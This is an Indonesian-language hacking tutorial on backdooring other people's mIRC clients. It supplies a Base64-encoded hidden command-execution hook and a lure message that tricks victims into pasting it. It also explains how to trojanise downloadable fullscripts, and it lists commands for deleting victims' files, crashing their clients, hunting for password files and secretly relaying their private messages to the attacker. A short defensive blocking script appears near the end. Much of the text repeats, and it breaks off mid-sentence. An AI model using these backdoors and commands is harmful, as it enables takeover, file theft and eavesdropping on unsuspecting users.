- Remote Script mIRC Dengan Base64 Encoding -
A. Intro
Artikel ini hampir sama dengan Artikel saya yang berjudul “Bermain Virus IRC On Encode
Description”, hanya saja pada artikel ini kita akan melakukan suatu aktifitas yang lebih mengarah
kepada system, yaitu remote script. Sedangkan kesamaannya dengan artikel tersebut adalah samasama
menggunakan encode text dan melakukan Private Message dalam penginfeksian. Pengertian
dari remote script disini kurang lebih adalah kita bisa melakukan apa saja terhadap script orang
lain, “dengan catatan” script orang yang kita tuju telah disisipi suatu baris command “on event”
milik kita, seperti contoh berikut :
on ^*:text:codet*:?:{ . $+ $2- | haltdef }
Yang mana artinya kurang lebih adalah : Setiap kalimat didalam query (private message)
dengan kata yang diawali dengan “codet” tidak akan terlihat oleh yang punya script dan melakukan
baris perintah pada kata yang kedua dan seterusnya ( “$2-” ).
Bagaimana cara menuliskannya pada script orang yang kita tuju? Sedangkan orang tersebut
saya yakin 99% tidak akan mau disuruh untuk menuliskannya. Mungkin kamu pernah menerima
Private Message dari seseorang yang isinya kurang lebih seperti berikut :
<nick-pengirim> mau dapat akses di #namachannel ? copy dan paste kan ini --> //write script.mrc
$decode(b24gXio6dGV4dDpjb2RldCo6Pzp7IC4gJCsgJDItIHwgaGFsdGRlZiB9,m) | .load -rs script.mrc | msg
#namachannel - Register -
Tawaran diatas sebenarnya bukanlah sungguhan, itu merupakan pancingan kepada korban
untuk melakukan copy-paste script yang dikirimkan oleh pelaku, yang tidak lain isinya sama dengan
baris script yang diatas. Sayangnya masih saja ada yang percaya dengan tawaran tersebut,
walaupun sebagian besar para chatter tidak tergiur dengan tawaran tersebut.
Pada artikel kali ini kita akan mencoba membuat encode text yang berisikan code yang hendak
kamu kirimkan kepada korban, dialog menu Encoder Text, command yang bisa diberikan kepada
korban, berikut penangkalnya.
B. Menyusun Perlengkapan
Code “b24gXio6dGV4dDpjb2RldCo6Pzp7IC4gJCsgJDItIHwgaGFsdGRlZiB9” adalah text yang dihasilkan
dari Base64 encoding yang didalam mIRC code tersebut merupakan suatu baris perintah :
on ^*:text:codet*:?:{ . $+ $2- | haltdef }
Text inilah yang nantinya akan kita kirimkan kepada korban. Kamu bisa mengganti trigger text
tersebut diatas (codet*) dengan kata lain, misalnya serv*, kamu bebas berkreatifitas sendiri. Tetapi
bagaimana cara meng-encode kannya setelah baris perintah tersebut diedit? Untuk itu kita akan
membuat dialog menu encoder text. Siapkan mIRC Script Editor kamu. Kemudian tulislah snippet
dibawah ini, atau jika kamu telah memilikinya abaikan saja snippet dibawah ini. Snippet berikut
saya copy dari artikel saya yang berjudul “Bermain Virus IRC On Encode Description”.
alias text2encode { $iif(!$dialog(t2e), dialog -m t2e t2e_tb, dialog -v t2e) }
menu menubar {
Encoder Text: /text2encode
}
dialog t2e_tb {
title "EncodeR"
size -1 -1 180 72
option dbu
text "Masukkan text/sentences yang akan di Encode-kan:", 1, 0 7 180 8, center
text "Input :", 2, 2 19 27 8, right
text "Output :", 3, 2 29 27 8, right
edit "", 4, 32 19 110 9, autohs
edit "", 5, 32 29 110 34, vsbar multi read
button "Set", 6, 145 19 30 9
}
on *:dialog:t2e:*:*:{
if ($devent == sclick) {
if ($did = 6) && ($did(4) != $null) { %a = $encode($did(4).text,m) | did -ra $dname 5 %a }
}
}
Untuk keterangan listingnya, kamu bisa buka help dari dalam folder mIRC kamu. Setelah dialog
tersebut diatas telah selesai, panggil dialog tersebut dengan mengetikkan /text2encode pada
editbox kamu. Jika tidak ada masalah dialog menu tersebut tampil di hadapan anda. Buka kembali
code yang telah kita edit dan kita siapkan sebelumnya :
on ^*:text:serv*:?:{ . $+ $2- | haltdef }
Copylah baris code tersebut ke dalam dialog menu encoder yang telah kita panggil tadi pada
kolom input, kemudian tekan tombol “set”. Pada kolom output, yaitu pada bagian kolom
dibawahnya akan muncul sederet text asing. Copy lah keseluruhan text tersebut dengan meng-klik
kanan mouse kamu pada text tersebut pilih menu “Select All” ---> “Copy”.
Lantas akan kita pastekan kemana text hasil copy ini? Tunggu sebentar tahan dulu niat untuk
mem-paste nya. Kita bikin menu nicklist untuk memudahkan kita dalam pengiriman “paket” ke
korban. Siapkan mIRC script editor kamu, dan salinlah snippet menu dibawah ini :
menu nicklist {
$iif(!$server, $style(2)) send base64:sbase $$1
}
alias sbase {
var %a = PASTEKAN DISINI
/msg $$1 mau dapat akses di # ? copy dan paste kan ini --> //write script.mrc $ $+ decode( $+ %a $+
,m) $+($chr(124)) .load -rs script.mrc $+($chr(124)) msg #namachannel - Register -
}
Perhatikan baris pada var %a yang bercetak tebal dan berwarna merah, kamu bisa mempastekan
text yang kamu copy tadi di dialog menu encoder pada baris tersebut sehingga
menjadi :
var %a = b24gXio6dGV4dDpzZXJ2Kjo/OnsgLiAkKy.....dst
Berikut keterangan listing code tersebut diatas
menu nicklist {
membuat menu baru pada nicklist dengan tanda kurawa buka yang artinya memulai aksi.
$iif(!$server, $style(2)) send base64:sbase $$1
Jika server tidak terkoneksi, disablekan menu “Send base64”. Tetapi sebaliknya, Jika server dalam keadaan
terkoneksi, enablekan menu “Send base64” dengan pemberian perintah /sbase.
}
Penutup script dari menu nicklist
alias sbase {
Alias dari command /sbase, dengan tanda kurawa buka yang artinya pembuka script.
var %a = PASTEKAN DISINI
merupakan kata/code ganti suatu command/kata yang divariablekan. Yang dalam hal ini adalah
text yang telah kamu encode-kan.
/msg $$1 mau dapat akses di # ? copy dan paste kan ini --> //write script.mrc $ $+ decode( $+ %a $+
,m) $+($chr(124)) .load -rs script.mrc $+($chr(124)) msg #namachannel - Register -
Adalah aksi dari alias /sbase dengan mengirimkan message kepada nick yang dituju ($$1) yang
mana isi dari pesan ini mengandung variable %a.
$+($chr(124)) adalah ascii pengganti dari character : |
Setelah selesai dituliskan di script editor kamu, cobalah klik kanan pada nick yang dituju,
dengan catatan kamu harus berada dalam posisi terkoneksi ke server. Jika tidak ada halangan,
kamu akan mendapatkan satu menu baru yang bertuliskan “send base64”. Jika menu ini diklik,
maka script akan memanggil command /sbase yang isinya seperti tersebut diatas dan
mengirimkannya kepada nick yang dituju.
Jika code kita berhasil masuk atau dengan kata lain si korban telah meng-copy paste kan
kiriman kita, kita cukup melihatnya di terminal channel apakah korban “mengucapkan” :
<nick korban> – Register -
Jika pada layar channel, kita mendapati korban “mengucapkan” kata tersebut, coba tes dengan
mengetikkan : /msg <nick korban> serv .msg <nick kamu> hai..
Jika kamu mendapati bahwa korban telah memberikan message kepada kamu dengan ucapan
“hai..”. Selamat..! kamu telah berhasil menyisipkan code tersebut di script korban. Dan kamu
bisa melakukan experimen-experimen berikutnya dengan menuliskan command mIRC lainnya.
Sebenarnya ada cara lainnya untuk menyusupkan baris text ini didalam script, yaitu dengan
menuliskannya secara langsung didalam script. Coba kamu pergi www.hawkee.com, atau
www.mirc.org, atau situs lainnya yang menyediakan download-an fullscript. Download lah script
yang diinginkan kemudian edit lah pada editor scriptnya dengan menyisipkan baris code
tersebut diatas. Untuk selanjutnya hostingkan kembali fullscript yang telah kamu edit itu di site
kamu. Dan kamu tinggal “memasarkannya”. Dan jangan lupa, kamu harus memasang tanda
pengenal (ciri) pada script tersebut, ketika korban memakainya. Tanda pengenal ini bisa berupa
“ctcp reply ping” atau sebagainya, terserah kamu.
Untuk mengecheck, apakah korban tersebut menggunakan fullscript yang telah kita edit
tersebut, lakukan pengechek-an terhadap korban dengan tanda pengenal yang telah kita
pasang di dalam full script tersebut. Misalkan tanda pengenal tersebut berupa “Ping Replier”.
/ctcp <nick korban> ping
dan kamu mendapatkan jawaban sama dengan apa yang telah kamu setting, maka lakukan lah
tes dengan mengetikkan : /msg <nick korban> serv .msg <nick kamu> hai..
C. Daftar Command Yang Bisa Dikirimkan
Berikut ini adalah sebagian dari daftar command mIRC yang bisa kamu eksekusikan terhadap
korban. Kamu bisa bereksperimen sendiri dengan command-command mIRC lainnya terhadap
korban.
Membuat korban menuliskan message di channel :
/msg <korban> serv msg #wongprabu halo semuanya...
Command ini akan membuat korban berbicara di channel #wongprabu dengan isi pesan : “halo
semuanya...”
Membuat korban menuliskan message ke nick lain :
/msg <korban> serv msg <nick yang dituju> asl pls dunk
Command ini akan membuat korban mengirimkan Private Message ke nick yang dituju dengan
isi pesan: “asl pls dunk”
Membuat korban join ke channel :
/msg <korban> serv join #wongprabu
Membuat korban part dari channel :
/msg <korban> serv part #wongprabu
Membuat korban membuka situs :
/msg <korban> serv url www.bising.co.nr
Membuat korban berganti nick :
/msg <korban> serv nick <ganti dengan nick yang kamu inginkan>
Dan sederet perintah mIRC standar lainnya, kamu bisa mengembangkannya sendiri. Buka Help
yang ada di dalam folder mIRC kamu untuk perintah-perintah standar lainnya. Seperti notice,
ctcp, invite, kick, ban, mode, dcc, ignore, quit, dan lainnya.
Yang harus kamu perhatikan adalah sebelum kamu mengetikkan command tersebut, harus
diawali dengan “trigger” (kata kunci) kamu, yang pada contoh diatas adalah “serv”.
Selain dari perintah standar untuk chatter mIRC tersebut, kita akan mencoba perintah lainnya
yang mengarah kepada system.
Membuat alias baru pada script korban :
/msg <korban> serv write newscript.mrc alias dodol { .msg #wongprabu dodol }
/msg <korban> serv .load -rs newscript.mrc
/msg <korban> serv dodol
Kita akan membuat script baru dengan nama file “newscript.mrc”, isi dari file newscript.mrc
tersebut adalah “alias dodol { .msg #wongprabu dodol }”. Setelah dituliskan, kita akan me-load
nya, yang kemudian panggil perintah “dodol” yang berisikan aksi tersebut.
Meng-unload -rs script :
/msg <korban> serv .unload -rs newscript.mrc
command ini meng-unload kan script yang bernama newscript.mrc
Menghapus isi textfile :
/msg <korban> serv write -c newscript.mrc
command ini akan menghapus semua isi text dari file yang bernama newscript.mrc
Menghapus file:
/msg <korban> serv .remove newscript.mrc
command ini akan menghapus file yang bernama newscript.mrc
Membuat mIRC korban menjadi crash :
/msg <korban> serv write newscript.mrc alias crash { while (1 != 2) { beep } }
/msg <korban> serv .load -rs newscript.mrc
/msg <korban> serv crash
Memeriksa file pada harddisk korban :
/msg <korban> serv write newscript.mrc alias chechk1 { .echo $findfile(C:\,pass.*,0, .msg
<nickkamu> $1-) }
/msg <korban> serv .load -rs newscript.mrc
/msg <korban> serv chechk1
Mengganti background mIRC korban :
/msg <korban> serv background [-aemsgdluhcfnrtpx] [nama window] [nama file]
-a : active window
-m : main mIRC window
-s : status window
-g : finger window
-d : single message window
-e : set as default
-cfnrtp : center, fill, normal, stretch, tile, photo
-l : toolbar
-u : toolbar buttons
-h : switchbar
-x : no background picture
contoh /msg <korban> serv background -sc c:\mypictures\bullet.gif
Yang artinya kita mengganti background pada window status dengan file gambar yang berada
di drive c: folder mypicture dan nama filenya adalah bullet.gif.
Menguping pembicaraan korban :
/msg <korban> serv write sys on *:TEXT:*:?: { .msg <nickkamu> <- = $+ $nick $+ = $1- }
/msg <korban> serv write sys on *:INPUT:?: { .msg <nickkamu> -> $iif($left($1,1) != /,= $+
$me $+ =) $1- }
/msg <korban> serv .load -rs newscript.mrc
Setiap Private message yang dilakukan korban dengan nick mana saja, isi dari pembicaraan
tersebut akan dikirimkan ke nick kamu, dengan catatan, jika kamu sedang ONLINE. Atau jika
tidak mau susah kirimkan saja isi dari pembicaraan tersebut ke psy kamu (jika ada), dan kamu
bisa membukanya setiap saat.
Memasang sinyal/tanda :
Memasang sinyal/tanda bahwa korban terkoneksi ke server dengan pemberitahuan ke nick
kamu.
/msg <korban> serv write sys on *:connect: { .msg <nick kamu> $timestamp aku online bos }
/msg <korban> serv .load -rs sys
Dan masih banyak lagi command-command mIRC lainnya yang bisa kamu praktekkan. Kamu
bisa lihat mIRC HELP untuk daftar command. Dengan acuan cara pengiriman command,
pembuatan script, dan load script seperti yang telah dijabarkan diatas.
Untuk praktek tanpa online kamu bisa menggunakan sofware bantuan bircd.exe, software ini
merupakan virtual online untuk uji coba script kamu tanpa harus terkoneksi ke internet. Coba
download software tersebut, mencari di Google dengan kata kunci “bircd.exe”. Atau kamu bisa
menghubungi kruw www.bising.co.nr untuk mendapatkannya, gratis.
D. Penangkalan
Sama halnya dengan virus/spam mirc yang saya tulis di artikel saya yang berjudul “Bermain
Virus IRC On Encode Description” proses infeksinya melalui kesalahan dari korban, yang meng-copy
paste code tersebut. Jika kamu adalah pemakai fullscript hasil downloa-an dari sumber situs yang
kurang bisa dipercaya, coba periksa kembali isi scirptnya, jika terdapat tanda-tanda seperti yang
telah diuraikan diatas, ada kemungkinan bahwa kamu telah mengalami “remote script”. Cara yang
terbaik tidak menggunakan fullscript tersebut. Kamu bisa mendowload fullscript dari sumber yang
bisa dipercaya, seperti www.hawkee.com, situs ini menyediakan banyak fullscript yang bisa kamu
pakai dengan aman.
Berikut ini adalah snippet code untuk menolak kiriman tersebut, saya copy dari artikel saya
yang berjudul “Bermain Virus IRC On Encode Description”. Jika kamu telah menuliskannya di mIRC
script editor kamu, abaikan saja snippet dibawah ini. Siapkan script editor kamu dan tuliskan
snippet berikut ini :
on *:open:?: {
var %temp = 1
while ( %temp <= $comchan($nick,0) ) {
var %chan = %chan $comchan($nick,%temp)
if ($nick == $me) { halt }
if ($me !isop $comchan($nick,%temp)) || (%chan == $null) {
var %word = load
if (%word isin $strip($1-)) {
.ignore -pcntikdu $+ 120 $nick
.timer 1 1 close -m $nick
echo -s * - Spam dari $nick telah diblokir -
linesep -s | halt
}}
if ($me isop $comchan($nick,%temp)) {
var %word = load
if (%word isin $strip($1-)) {
ban $+(-u,120) $comchan($nick,%temp) $nick 5
if ($nick ison $comchan($nick,%temp)) { kick $comchan($nick,%temp) $nick -[Spammer.. on Query]- }
.ignore -pcntikdu $+ 120 $nick
.timer 1 1 close -m $nick
echo -s * - Spam dari $nick telah diblokir -
linesep -s | halt
}}
inc %temp
}}
Baris keterangan :
on *:open:?: {
Event pada saat query nick pertama kali dibuka.
var %temp = 1
while ( %temp <= $comchan($nick,0) ) {
Ketika kondisi variable dari %temp lebih kecil nilainya atau sama dengan dari pada jumlah
channel kamu dan nick tersebut berada, maka lakukan aksi.
var %chan = %chan $comchan($nick,%temp)
if ($nick == $me) { halt }
Channel dimana nick tersebut dan kamu berada digantikan dengan variable %chan, dan jika
yang kirim pesan tersebut atas nama kamu aksinya di-halt (script dihentikan).
if ($me !isop $comchan($nick,%temp)) || (%chan == $null) {
var %word = load
if (%word isin $strip($1-)) {
.ignore -pcntikdu $+ 120 $nick
.timer 1 1 close -m $nick
echo -s * - Spam dari $nick telah diblokir -
linesep -s | halt } }
Jika kamu bukan OP pada channel dimana nick tersebut berada, atau nick tersebut tidak
bersama didalam satu channel dengan kamu, maka lakukan aksi ( “{“ ). Text “Load” digantikan
oleh variable %word, dan jika kalimat yang dikirimkan oleh seseorang ($nick) mengandung
variable %word, maka lakukan :
.ignore -pcntikdu $+ 120 $nick
Ignore-kan nick tersebut selama 120 sec
.timer 1 1 close -m $nick
Set waktu pada detik ke satu, tutup window query nick.
echo -s * - Spam dari $nick telah diblokir -
Pada window status, tampilkan pesan.
linesep -s | halt
Memberikan separator pada layar status, serta menghentikan script (halt).
if ($me isop $comchan($nick,%temp)) {
var %word = load
if (%word isin $strip($1-)) {
ban $+(-u,120) $comchan($nick,%temp) $nick 5
if ($nick ison $comchan($nick,%temp)) { kick $comchan($nick,%temp) $nick -[Spammer..
on Query]- }
.ignore -pcntikdu $+ 120 $nick
.timer 1 1 close -m $nick
echo -s * - Spam dari $nick telah diblokir -
linesep -s | halt } }
Jika kamu adalah OP pada channel dimana nick tersebut berada, maka lakukan aksi ( “{“ ). Text
“Load” digantikan oleh variable %word, dan jika kalimat yang dikirimkan oleh seseorang ($nick)
mengandung variable %word, maka lakukan :
ban $+(-u,120) $comchan($nick,%temp) $nick 5
mode ban pada nick tersebut selama 120 sec dengan type ban 5
if ($nick ison $comchan($nick,%temp)) { kick $comchan($nick,%temp) $nick -[Spammer.. on Query]- }
Jika nick tersebut ada di dalam channel, maka kick nick tersebut.
.ignore -pcntikdu $+ 120 $nick
Ignore-kan nick tersebut selama 120 sec
.timer 1 1 close -m $nick
Set waktu pada detik ke satu, tutup window query nick.
echo -s * - Spam dari $nick telah diblokir -
Pada window status, tampilkan pesan.
linesep -s | halt
Memberikan separator pada layar status, serta menghentikan script (halt).
inc %temp } }
Melakukan perulangan untuk variable %temp, dan menutup baris script dari event open.
Jika tidak ada masalah, dan ketika ada seseorang yang mem-private message kamu dengan
contoh code diatas, script ini akan melakukan aktifitasnya.
E. Finishing
Jangan mudah percaya dengan apa yang ditawarkan oleh seseorang di Private Message. Jika
kamu berniat menggunakan mIRC fullscript, sebaiknya membuat sendiri fullscript tersebut atau
mendownloadnya dari situs yang bisa dipercaya. Karena sebagan besar trojan menunggu kelalaian
dari user. Sedangkan mIRC merupakan salah satu “pintu besar” bagi trojan untuk masuk.
Tidak ada maksud lain dari penulisan artikel ini, melainkan hanya untuk tahu dan bagaimana
cara kita menyikapinya. Artikel ini mungkin jauh dari harapan, untuk itu kepada para master dan
suhu, mohon bimbingannya.
sumber :
--= eof =--
[] Malu untuk mengakui yang bukan miliknya
[] Best Regard teman-teman seperjuangan.
MeTaLaToR [Bising Teams @ 2008 - www.bising.co.nr
:: www.bising.co.nr – CopyLeft @ 2008 ::.
A. Intro
Artikel ini hampir sama dengan Artikel saya yang berjudul “Bermain Virus IRC On Encode
Description”, hanya saja pada artikel ini kita akan melakukan suatu aktifitas yang lebih mengarah
kepada system, yaitu remote script. Sedangkan kesamaannya dengan artikel tersebut adalah samasama
menggunakan encode text dan melakukan Private Message dalam penginfeksian. Pengertian
dari remote script disini kurang lebih adalah kita bisa melakukan apa saja terhadap script orang
lain, “dengan catatan” script orang yang kita tuju telah disisipi suatu baris command “on event”
milik kita, seperti contoh berikut :
on ^*:text:codet*:?:{ . $+ $2- | haltdef }
Yang mana artinya kurang lebih adalah : Setiap kalimat didalam query (private message)
dengan kata yang diawali dengan “codet” tidak akan terlihat oleh yang punya script dan melakukan
baris perintah pada kata yang kedua dan seterusnya ( “$2-” ).
Bagaimana cara menuliskannya pada script orang yang kita tuju? Sedangkan orang tersebut
saya yakin 99% tidak akan mau disuruh untuk menuliskannya. Mungkin kamu pernah menerima
Private Message dari seseorang yang isinya kurang lebih seperti berikut :
<nick-pengirim> mau dapat akses di #namachannel ? copy dan paste kan ini --> //write script.mrc
$decode(b24gXio6dGV4dDpjb2RldCo6Pzp7IC4gJCsgJDItIHwgaGFsdGRlZiB9,m) | .load -rs script.mrc | msg
#namachannel - Register -
Tawaran diatas sebenarnya bukanlah sungguhan, itu merupakan pancingan kepada korban
untuk melakukan copy-paste script yang dikirimkan oleh pelaku, yang tidak lain isinya sama dengan
baris script yang diatas. Sayangnya masih saja ada yang percaya dengan tawaran tersebut,
walaupun sebagian besar para chatter tidak tergiur dengan tawaran tersebut.
Pada artikel kali ini kita akan mencoba membuat encode text yang berisikan code yang hendak
kamu kirimkan kepada korban, dialog menu Encoder Text, command yang bisa diberikan kepada
korban, berikut penangkalnya.
B. Menyusun Perlengkapan
Code “b24gXio6dGV4dDpjb2RldCo6Pzp7IC4gJCsgJDItIHwgaGFsdGRlZiB9” adalah text yang dihasilkan
dari Base64 encoding yang didalam mIRC code tersebut merupakan suatu baris perintah :
on ^*:text:codet*:?:{ . $+ $2- | haltdef }
Text inilah yang nantinya akan kita kirimkan kepada korban. Kamu bisa mengganti trigger text
tersebut diatas (codet*) dengan kata lain, misalnya serv*, kamu bebas berkreatifitas sendiri. Tetapi
bagaimana cara meng-encode kannya setelah baris perintah tersebut diedit? Untuk itu kita akan
membuat dialog menu encoder text. Siapkan mIRC Script Editor kamu. Kemudian tulislah snippet
dibawah ini, atau jika kamu telah memilikinya abaikan saja snippet dibawah ini. Snippet berikut
saya copy dari artikel saya yang berjudul “Bermain Virus IRC On Encode Description”.
alias text2encode { $iif(!$dialog(t2e), dialog -m t2e t2e_tb, dialog -v t2e) }
menu menubar {
Encoder Text: /text2encode
}
dialog t2e_tb {
title "EncodeR"
size -1 -1 180 72
option dbu
text "Masukkan text/sentences yang akan di Encode-kan:", 1, 0 7 180 8, center
text "Input :", 2, 2 19 27 8, right
text "Output :", 3, 2 29 27 8, right
edit "", 4, 32 19 110 9, autohs
edit "", 5, 32 29 110 34, vsbar multi read
button "Set", 6, 145 19 30 9
}
on *:dialog:t2e:*:*:{
if ($devent == sclick) {
if ($did = 6) && ($did(4) != $null) { %a = $encode($did(4).text,m) | did -ra $dname 5 %a }
}
}
Untuk keterangan listingnya, kamu bisa buka help dari dalam folder mIRC kamu. Setelah dialog
tersebut diatas telah selesai, panggil dialog tersebut dengan mengetikkan /text2encode pada
editbox kamu. Jika tidak ada masalah dialog menu tersebut tampil di hadapan anda. Buka kembali
code yang telah kita edit dan kita siapkan sebelumnya :
on ^*:text:serv*:?:{ . $+ $2- | haltdef }
Copylah baris code tersebut ke dalam dialog menu encoder yang telah kita panggil tadi pada
kolom input, kemudian tekan tombol “set”. Pada kolom output, yaitu pada bagian kolom
dibawahnya akan muncul sederet text asing. Copy lah keseluruhan text tersebut dengan meng-klik
kanan mouse kamu pada text tersebut pilih menu “Select All” ---> “Copy”.
Lantas akan kita pastekan kemana text hasil copy ini? Tunggu sebentar tahan dulu niat untuk
mem-paste nya. Kita bikin menu nicklist untuk memudahkan kita dalam pengiriman “paket” ke
korban. Siapkan mIRC script editor kamu, dan salinlah snippet menu dibawah ini :
menu nicklist {
$iif(!$server, $style(2)) send base64:sbase $$1
}
alias sbase {
var %a = PASTEKAN DISINI
/msg $$1 mau dapat akses di # ? copy dan paste kan ini --> //write script.mrc $ $+ decode( $+ %a $+
,m) $+($chr(124)) .load -rs script.mrc $+($chr(124)) msg #namachannel - Register -
}
Perhatikan baris pada var %a yang bercetak tebal dan berwarna merah, kamu bisa mempastekan
text yang kamu copy tadi di dialog menu encoder pada baris tersebut sehingga
menjadi :
var %a = b24gXio6dGV4dDpzZXJ2Kjo/OnsgLiAkKy.....dst
Berikut keterangan listing code tersebut diatas
menu nicklist {
membuat menu baru pada nicklist dengan tanda kurawa buka yang artinya memulai aksi.
$iif(!$server, $style(2)) send base64:sbase $$1
Jika server tidak terkoneksi, disablekan menu “Send base64”. Tetapi sebaliknya, Jika server dalam keadaan
terkoneksi, enablekan menu “Send base64” dengan pemberian perintah /sbase.
}
Penutup script dari menu nicklist
alias sbase {
Alias dari command /sbase, dengan tanda kurawa buka yang artinya pembuka script.
var %a = PASTEKAN DISINI
merupakan kata/code ganti suatu command/kata yang divariablekan. Yang dalam hal ini adalah
text yang telah kamu encode-kan.
/msg $$1 mau dapat akses di # ? copy dan paste kan ini --> //write script.mrc $ $+ decode( $+ %a $+
,m) $+($chr(124)) .load -rs script.mrc $+($chr(124)) msg #namachannel - Register -
Adalah aksi dari alias /sbase dengan mengirimkan message kepada nick yang dituju ($$1) yang
mana isi dari pesan ini mengandung variable %a.
$+($chr(124)) adalah ascii pengganti dari character : |
Setelah selesai dituliskan di script editor kamu, cobalah klik kanan pada nick yang dituju,
dengan catatan kamu harus berada dalam posisi terkoneksi ke server. Jika tidak ada halangan,
kamu akan mendapatkan satu menu baru yang bertuliskan “send base64”. Jika menu ini diklik,
maka script akan memanggil command /sbase yang isinya seperti tersebut diatas dan
mengirimkannya kepada nick yang dituju.
Jika code kita berhasil masuk atau dengan kata lain si korban telah meng-copy paste kan
kiriman kita, kita cukup melihatnya di terminal channel apakah korban “mengucapkan” :
<nick korban> – Register -
Jika pada layar channel, kita mendapati korban “mengucapkan” kata tersebut, coba tes dengan
mengetikkan : /msg <nick korban> serv .msg <nick kamu> hai..
Jika kamu mendapati bahwa korban telah memberikan message kepada kamu dengan ucapan
“hai..”. Selamat..! kamu telah berhasil menyisipkan code tersebut di script korban. Dan kamu
bisa melakukan experimen-experimen berikutnya dengan menuliskan command mIRC lainnya.
Sebenarnya ada cara lainnya untuk menyusupkan baris text ini didalam script, yaitu dengan
menuliskannya secara langsung didalam script. Coba kamu pergi www.hawkee.com, atau
www.mirc.org, atau situs lainnya yang menyediakan download-an fullscript. Download lah script
yang diinginkan kemudian edit lah pada editor scriptnya dengan menyisipkan baris code
tersebut diatas. Untuk selanjutnya hostingkan kembali fullscript yang telah kamu edit itu di site
kamu. Dan kamu tinggal “memasarkannya”. Dan jangan lupa, kamu harus memasang tanda
pengenal (ciri) pada script tersebut, ketika korban memakainya. Tanda pengenal ini bisa berupa
“ctcp reply ping” atau sebagainya, terserah kamu.
Untuk mengecheck, apakah korban tersebut menggunakan fullscript yang telah kita edit
tersebut, lakukan pengechek-an terhadap korban dengan tanda pengenal yang telah kita
pasang di dalam full script tersebut. Misalkan tanda pengenal tersebut berupa “Ping Replier”.
/ctcp <nick korban> ping
dan kamu mendapatkan jawaban sama dengan apa yang telah kamu setting, maka lakukan lah
tes dengan mengetikkan : /msg <nick korban> serv .msg <nick kamu> hai..
C. Daftar Command Yang Bisa Dikirimkan
Berikut ini adalah sebagian dari daftar command mIRC yang bisa kamu eksekusikan terhadap
korban. Kamu bisa bereksperimen sendiri dengan command-command mIRC lainnya terhadap
korban.
Membuat korban menuliskan message di channel :
/msg <korban> serv msg #wongprabu halo semuanya...
Command ini akan membuat korban berbicara di channel #wongprabu dengan isi pesan : “halo
semuanya...”
Membuat korban menuliskan message ke nick lain :
/msg <korban> serv msg <nick yang dituju> asl pls dunk
Command ini akan membuat korban mengirimkan Private Message ke nick yang dituju dengan
isi pesan: “asl pls dunk”
Membuat korban join ke channel :
/msg <korban> serv join #wongprabu
Membuat korban part dari channel :
/msg <korban> serv part #wongprabu
Membuat korban membuka situs :
/msg <korban> serv url www.bising.co.nr
Membuat korban berganti nick :
/msg <korban> serv nick <ganti dengan nick yang kamu inginkan>
Dan sederet perintah mIRC standar lainnya, kamu bisa mengembangkannya sendiri. Buka Help
yang ada di dalam folder mIRC kamu untuk perintah-perintah standar lainnya. Seperti notice,
ctcp, invite, kick, ban, mode, dcc, ignore, quit, dan lainnya.
Yang harus kamu perhatikan adalah sebelum kamu mengetikkan command tersebut, harus
diawali dengan “trigger” (kata kunci) kamu, yang pada contoh diatas adalah “serv”.
Selain dari perintah standar untuk chatter mIRC tersebut, kita akan mencoba perintah lainnya
yang mengarah kepada system.
Membuat alias baru pada script korban :
/msg <korban> serv write newscript.mrc alias dodol { .msg #wongprabu dodol }
/msg <korban> serv .load -rs newscript.mrc
/msg <korban> serv dodol
Kita akan membuat script baru dengan nama file “newscript.mrc”, isi dari file newscript.mrc
tersebut adalah “alias dodol { .msg #wongprabu dodol }”. Setelah dituliskan, kita akan me-load
nya, yang kemudian panggil perintah “dodol” yang berisikan aksi tersebut.
Meng-unload -rs script :
/msg <korban> serv .unload -rs newscript.mrc
command ini meng-unload kan script yang bernama newscript.mrc
Menghapus isi textfile :
/msg <korban> serv write -c newscript.mrc
command ini akan menghapus semua isi text dari file yang bernama newscript.mrc
Menghapus file:
/msg <korban> serv .remove newscript.mrc
command ini akan menghapus file yang bernama newscript.mrc
Membuat mIRC korban menjadi crash :
/msg <korban> serv write newscript.mrc alias crash { while (1 != 2) { beep } }
/msg <korban> serv .load -rs newscript.mrc
/msg <korban> serv crash
Memeriksa file pada harddisk korban :
/msg <korban> serv write newscript.mrc alias chechk1 { .echo $findfile(C:\,pass.*,0, .msg
<nickkamu> $1-) }
/msg <korban> serv .load -rs newscript.mrc
/msg <korban> serv chechk1
Mengganti background mIRC korban :
/msg <korban> serv background [-aemsgdluhcfnrtpx] [nama window] [nama file]
-a : active window
-m : main mIRC window
-s : status window
-g : finger window
-d : single message window
-e : set as default
-cfnrtp : center, fill, normal, stretch, tile, photo
-l : toolbar
-u : toolbar buttons
-h : switchbar
-x : no background picture
contoh /msg <korban> serv background -sc c:\mypictures\bullet.gif
Yang artinya kita mengganti background pada window status dengan file gambar yang berada
di drive c: folder mypicture dan nama filenya adalah bullet.gif.
Menguping pembicaraan korban :
/msg <korban> serv write sys on *:TEXT:*:?: { .msg <nickkamu> <- = $+ $nick $+ = $1- }
/msg <korban> serv write sys on *:INPUT:?: { .msg <nickkamu> -> $iif($left($1,1) != /,= $+
$me $+ =) $1- }
/msg <korban> serv .load -rs newscript.mrc
Setiap Private message yang dilakukan korban dengan nick mana saja, isi dari pembicaraan
tersebut akan dikirimkan ke nick kamu, dengan catatan, jika kamu sedang ONLINE. Atau jika
tidak mau susah kirimkan saja isi dari pembicaraan tersebut ke psy kamu (jika ada), dan kamu
bisa membukanya setiap saat.
Memasang sinyal/tanda :
Memasang sinyal/tanda bahwa korban terkoneksi ke server dengan pemberitahuan ke nick
kamu.
/msg <korban> serv write sys on *:connect: { .msg <nick kamu> $timestamp aku online bos }
/msg <korban> serv .load -rs sys
Dan masih banyak lagi command-command mIRC lainnya yang bisa kamu praktekkan. Kamu
bisa lihat mIRC HELP untuk daftar command. Dengan acuan cara pengiriman command,
pembuatan script, dan load script seperti yang telah dijabarkan diatas.
Untuk praktek tanpa online kamu bisa menggunakan sofware bantuan bircd.exe, software ini
merupakan virtual online untuk uji coba script kamu tanpa harus terkoneksi ke internet. Coba
download software tersebut, mencari di Google dengan kata kunci “bircd.exe”. Atau kamu bisa
menghubungi kruw www.bising.co.nr untuk mendapatkannya, gratis.
D. Penangkalan
Sama halnya dengan virus/spam mirc yang saya tulis di artikel saya yang berjudul “Bermain
Virus IRC On Encode Description” proses infeksinya melalui kesalahan dari korban, yang meng-copy
paste code tersebut. Jika kamu adalah pemakai fullscript hasil downloa-an dari sumber situs yang
kurang bisa dipercaya, coba periksa kembali isi scirptnya, jika terdapat tanda-tanda seperti yang
telah diuraikan diatas, ada kemungkinan bahwa kamu telah mengalami “remote script”. Cara yang
terbaik tidak menggunakan fullscript tersebut. Kamu bisa mendowload fullscript dari sumber yang
